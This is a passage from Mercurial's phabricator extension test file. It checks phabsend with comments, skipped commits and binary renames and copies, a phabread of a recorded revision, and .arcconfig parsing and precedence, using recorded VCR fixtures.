  2 https://phab.mercurial-scm.org/D7917 D7917
  1 https://phab.mercurial-scm.org/D7916 D7916
  0 https://phab.mercurial-scm.org/D7915 D7915

Commenting when phabsending:
  $ echo comment > comment
  $ hg ci --addremove -m "create comment for phabricator test"
  adding comment
  $ hg phabsend -r . -m "For default branch" --test-vcr "$VCR/phabsend-comment-created.json"
  D7919 - created - d5dddca9023d: create comment for phabricator test
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/d5dddca9023d-adf673ba-phabsend.hg
  $ echo comment2 >> comment
  $ hg ci --amend
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/f7db812bbe1d-8fcded77-amend.hg
  $ hg phabsend -r . -m "Address review comments" --test-vcr "$VCR/phabsend-comment-updated.json"
  D7919 - updated - 1849d7828727: create comment for phabricator test

Phabsending a skipped commit:
  $ hg phabsend --no-amend -r . --test-vcr "$VCR/phabsend-skipped.json"
  D7919 - skipped - 1849d7828727: create comment for phabricator test

Phabsending a new binary, a modified binary, and a removed binary

  >>> open('bin', 'wb').write(b'\0a') and None
  $ hg ci -Am 'add binary'
  adding bin
  >>> open('bin', 'wb').write(b'\0b') and None
  $ hg ci -m 'modify binary'
  $ hg rm bin
  $ hg ci -m 'remove binary'
  $ hg phabsend -r .~2:: --test-vcr "$VCR/phabsend-binary.json"
  uploading bin@aa24a81f55de
  D8007 - created - aa24a81f55de: add binary
  uploading bin@d8d62a881b54
  D8008 - created - d8d62a881b54: modify binary
  D8009 - created - af55645b2e29: remove binary
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/aa24a81f55de-a3a0cf24-phabsend.hg

Phabsend a renamed binary and a copied binary, with and without content changes
to src and dest

  >>> open('bin2', 'wb').write(b'\0c') and None
  $ hg ci -Am 'add another binary'
  adding bin2

TODO: "bin2" can't be viewed in this commit (left or right side), and the URL
looks much different than when viewing "bin2_moved". No idea if this is a phab
bug or a phabsend bug. The patch (as printed by phabread) looks reasonable
though.

  $ hg mv bin2 bin2_moved
  $ hg ci -m "moved binary"

Note: "bin2_moved" is also not viewable in phabricator with this review

  $ hg cp bin2_moved bin2_copied
  $ hg ci -m "copied binary"

Note: "bin2_moved_again" is marked binary in phabricator, and both sides of it
are viewable in their proper state. "bin2_copied" is not viewable, and not
listed as binary in phabricator.

  >>> open('bin2_copied', 'wb').write(b'\0move+mod') and None
  $ hg mv bin2_copied bin2_moved_again
  $ hg ci -m "move+mod copied binary"

Note: "bin2_moved" and "bin2_moved_copy" are both marked binary, and both
viewable on each side.

  >>> open('bin2_moved', 'wb').write(b'\0precopy mod') and None
  $ hg cp bin2_moved bin2_moved_copied
  >>> open('bin2_moved', 'wb').write(b'\0copy src+mod') and None
  $ hg ci -m "copy+mod moved binary"

  $ hg phabsend -r .~4:: --test-vcr "$VCR/phabsend-binary-renames.json"
  uploading bin2@f42f9195e00c
  D8128 - created - f42f9195e00c: add another binary
  D8129 - created - 834ab31d80ae: moved binary
  D8130 - created - 494b750e5194: copied binary
  uploading bin2_moved_again@25f766b50cc2
  D8131 - created - 25f766b50cc2: move+mod copied binary
  uploading bin2_moved_copied@1b87b363a5e4
  uploading bin2_moved@1b87b363a5e4
  D8132 - created - 1b87b363a5e4: copy+mod moved binary
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/f42f9195e00c-e82a0769-phabsend.hg

Phabreading a DREV with a local:commits time as a string:
  $ hg phabread --test-vcr "$VCR/phabread-str-time.json" D1285
  # HG changeset patch
  # User Pulkit Goyal <7895pulkit@gmail.com>
  # Date 1509404054 -19800
  # Node ID 44fc1c1f1774a76423b9c732af6938435099bcc5
  # Parent 8feef8ef8389a3b544e0a74624f1efc3a8d85d35
  repoview: add a new attribute _visibilityexceptions and related API

  Currently we don't have a defined way in core to make some hidden revisions
  visible in filtered repo. Extensions to achieve the purpose of unhiding some
  hidden commits, wrap repoview.pinnedrevs() function.

  To make the above task simple and have well defined API, this patch adds a new
  attribute '_visibilityexceptions' to repoview class which will contains
  the hidden revs which should be exception.
  This will allow to set different exceptions for different repoview objects
  backed by the same unfiltered repo.

  This patch also adds API to add revs to the attribute set and get them.

  Thanks to Jun for suggesting the use of repoview class instead of localrepo.

  Differential Revision: https://phab.mercurial-scm.org/D1285
  diff --git a/mercurial/repoview.py b/mercurial/repoview.py
  --- a/mercurial/repoview.py
  +++ b/mercurial/repoview.py
  @@ * @@ (glob)
       subclasses of `localrepo`. Eg: `bundlerepo` or `statichttprepo`.
       """

  +    # hidden revs which should be visible
  +    _visibilityexceptions = set()
  +
       def __init__(self, repo, filtername):
           object.__setattr__(self, r'_unfilteredrepo', repo)
           object.__setattr__(self, r'filtername', filtername)
  @@ -231,6 +234,14 @@
               return self
           return self.unfiltered().filtered(name)

  +    def addvisibilityexceptions(self, revs):
  +        """adds hidden revs which should be visible to set of exceptions"""
  +        self._visibilityexceptions.update(revs)
  +
  +    def getvisibilityexceptions(self):
  +        """returns the set of hidden revs which should be visible"""
  +        return self._visibilityexceptions
  +
       # everything access are forwarded to the proxied repo
       def __getattr__(self, attr):
           return getattr(self._unfilteredrepo, attr)
  diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py
  --- a/mercurial/localrepo.py
  +++ b/mercurial/localrepo.py
  @@ -570,6 +570,14 @@
       def close(self):
           self._writecaches()

  +    def addvisibilityexceptions(self, exceptions):
  +        # should be called on a filtered repository
  +        pass
  +
  +    def getvisibilityexceptions(self):
  +        # should be called on a filtered repository
  +        return set()
  +
       def _loadextensions(self):
           extensions.loadall(self.ui)

A bad .arcconfig doesn't error out
  $ echo 'garbage' > .arcconfig
  $ hg config phabricator --debug
  invalid JSON in $TESTTMP/repo/.arcconfig
  read config from: */.hgrc (glob)
  $TESTTMP/repo/.hg/hgrc:*: phabricator.url=https://phab.mercurial-scm.org/ (glob)
  $TESTTMP/repo/.hg/hgrc:*: phabricator.callsign=HG (glob)

The .arcconfig content overrides global config
  $ cat >> $HGRCPATH << EOF
  > [phabricator]
  > url = global
  > callsign = global
  > EOF
  $ cp $TESTDIR/../.arcconfig .
  $ mv .hg/hgrc .hg/hgrc.bak
  $ hg config phabricator --debug
  read config from: */.hgrc (glob)
  $TESTTMP/repo/.arcconfig: phabricator.callsign=HG
  $TESTTMP/repo/.arcconfig: phabricator.url=https://phab.mercurial-scm.org/

But it doesn't override local config
  $ cat >> .hg/hgrc << EOF
  > [phabricator]
  > url = local
  > callsign = local
  > EOF
  $ hg config phabricator --debug
  read config from: */.hgrc (glob)
  $TESTTMP/repo/.hg/hgrc:*: phabricator.url=local (glob)
  $TESTTMP/repo/.hg/hgrc:*: phabricator.callsign=local (glob)
  $ mv .hg/hgrc.bak .hg/hgrc

  $ cd ..